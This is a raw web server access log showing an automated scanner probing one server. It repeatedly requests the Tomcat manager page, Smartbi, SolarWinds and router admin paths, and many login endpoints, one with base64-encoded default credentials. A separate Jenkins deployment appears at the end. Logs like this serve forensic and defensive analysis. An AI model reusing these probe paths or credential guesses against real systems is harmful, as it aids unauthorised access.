02:37:52 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 117 2024-12-12 02:37:52 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 120 2024-12-12 02:37:52 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 126 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 79 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 79 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0,+Win64,+x64,+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 80 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 111 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 98 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 72 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.7.24 - 404 7 0 74 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 80 2024-12-12 02:37:53 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.23 - 404 7 0 79 2024-12-12 02:37:54 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 101 2024-12-12 02:37:54 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 101 2024-12-12 02:37:54 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 98 2024-12-12 02:37:54 103.153.214.94 GET / /AdminAppData@no-mobile-0/0/15503332983847185/ 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 86 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 180 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 93 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+ZOE/2+Safari/605.1.15 - 404 7 0 88 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 53 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 78 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 56 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 55 2024-12-12 02:37:58 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 - 404 7 0 56 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 57 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 75 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 75 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 49 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 58 2024-12-12 02:37:59 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 61 2024-12-12 02:38:01 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 66 2024-12-12 02:38:01 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 87 2024-12-12 02:38:01 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 83 2024-12-12 02:38:01 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.21+(KHTML,+like+Gecko)+Version/17.0+Safari/616.21 - 404 7 0 81 2024-12-12 02:38:01 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 82 2024-12-12 02:38:02 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 89 2024-12-12 02:38:02 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 87 2024-12-12 02:38:02 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:93.0)+Gecko/20100101+Firefox/93.0 - 404 7 0 109 2024-12-12 02:38:02 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 122 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 140 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 141 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 150 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 151 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 163 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 164 2024-12-12 02:38:03 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 164 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 122 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+en-US;+rv:1.9.1.5)+Gecko/20091102+Firefox/3.5.5+(.NET+CLR+3.5.30729) - 404 7 0 107 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 129 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 110 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 123 2024-12-12 02:38:08 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 121 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 - 404 7 0 58 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 56 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 65 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 65 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36 - 404 7 0 77 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/85.0.4183.127+Safari/537.36 - 404 7 0 76 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 77 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.79+Safari/537.36 - 404 7 0 81 2024-12-12 02:38:09 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 48 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 45 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 55 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 48 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 48 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.8.25 - 404 7 0 39 2024-12-12 02:38:10 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 61 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 - 404 7 0 31 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 30 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 29 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 49 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 49 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 54 2024-12-12 02:38:11 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 54 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 56 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.3+Safari/605.1.15 - 404 7 0 55 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.110+Safari/537.36 - 404 7 0 66 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.5.19 - 404 7 0 78 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 82 2024-12-12 02:38:17 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 109 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 57 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 57 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 59 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 62 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 61 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 75 2024-12-12 02:38:18 103.153.214.94 GET /manager/html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 02:41:46 103.153.214.94 POST / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 51 2024-12-12 02:45:04 103.153.214.94 GET /admin/default/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 49 2024-12-12 02:45:09 103.153.214.94 POST /vision/RMIServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 02:45:09 103.153.214.94 POST /smartbi/vision/RMIServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 02:46:25 103.153.214.94 GET /InformationService/v3/Json/Query query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 02:46:25 103.153.214.94 GET /SolarWinds/InformationService/v3/Json/Query query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 54 2024-12-12 02:47:24 103.153.214.94 POST /j_security_check - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 02:47:34 103.153.214.94 GET /menu/home - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 02:48:21 103.153.214.94 POST /process/login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 02:48:25 103.153.214.94 POST /api/authentication/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.21 - 404 7 0 32 2024-12-12 02:48:25 103.153.214.94 POST /api/authentication/login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 31 2024-12-12 02:48:25 103.153.214.94 POST /api/authentication/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 42 2024-12-12 02:48:25 103.153.214.94 POST /api/authentication/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.7.21 - 404 7 0 78 2024-12-12 02:55:04 103.153.214.94 POST /users/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 37 2024-12-12 03:00:16 103.153.214.94 GET /login arg1=YWRtaW4%3D&arg2=dGltZWtlZXBlcg%3D%3D 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 03:00:20 103.153.214.94 POST /cgi/login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 66 2024-12-12 03:00:20 103.153.214.94 POST /cgi/login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 54 2024-12-12 03:00:51 103.153.214.94 POST /api/authenticate - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 03:01:40 103.153.214.94 GET /userRpm/MenuRpm.htm - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+aarch64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 118 2024-12-12 03:01:40 103.153.214.94 GET /userRpm/LoginRpm.htm Save=Save 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 117 2024-12-12 03:01:40 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 105 2024-12-12 03:01:59 103.153.214.94 POST /api/auth/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.16 - 404 7 0 41 2024-12-12 03:15:16 103.153.214.94 GET /versa/login.html - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.101+Safari/537.36 - 404 7 0 34 2024-12-12 03:15:16 103.153.214.94 POST /versa/login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 53 2024-12-12 03:16:56 103.153.214.94 GET /en-US/account/login return_to=%2Fen-US%2Faccount%2F 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 50 2024-12-12 03:16:57 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 14 2024-12-12 03:16:57 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 112 2024-12-12 03:16:57 103.153.214.94 HEAD /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20 2024-12-12 03:16:57 103.153.214.94 POST /msdeploy.axd Site=kiemkegpmb.gdtsolutions.vn 8172 jenkins 119.82.130.75 